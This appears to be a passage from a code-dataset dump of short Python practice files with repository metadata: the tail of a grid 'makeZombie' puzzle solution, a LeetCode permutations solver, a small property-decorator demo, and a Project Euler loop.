return max(0, hours-1) if human==0 else -1
obj = Solution()
print(obj.makeZombie([[0,1,1],[0,1,0],[0,0,0]])) | true |
90ce6a9a8c37c442ad56f8d72fbfe8f32193c890 | Python | zszzlmt/leetcode | /solutions/46.py | UTF-8 | 815 | 3.1875 | 3 | [] | no_license | class Solution(object):
res = []
def generate(self, l, travel, left):
if left == 0:
self.res.append(l)
return
for idx in range(len(travel)):
if travel[idx] == 0:
travel[idx] = 1
self.generate(l + [self.nums[idx]], travel, left - 1)
travel[idx] = 0
def permute(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
l = len(nums)
if l == 0:
return []
self.nums = nums
self.res = []
travel = [0] * l
for idx in range(l):
if travel[idx] == 0:
travel[idx] = 1
self.generate([nums[idx]], travel, l - 1)
travel[idx] = 0
return self.res | true |
0023b26f212248f811f16a21a6bb6c05d7b2e8d9 | Python | no7dw/py-practice | /property/h.py | UTF-8 | 135 | 3.265625 | 3 | [] | no_license | class Human():
def __init__(self):
pass
@property
def name(self):
return "Wade"
h = Human()
print(h.name)
| true |
53333bfa5759e8064c2b86d7cb435679502efdc4 | Python | ShiinaMashiro1314/Project-Euler | /Python/301.py | UTF-8 | 71 | 3.109375 | 3 | [] | no_license | a = 2
b = 3
for i in xrange(29):
temp = a
a = b
b = a+temp
print a | true |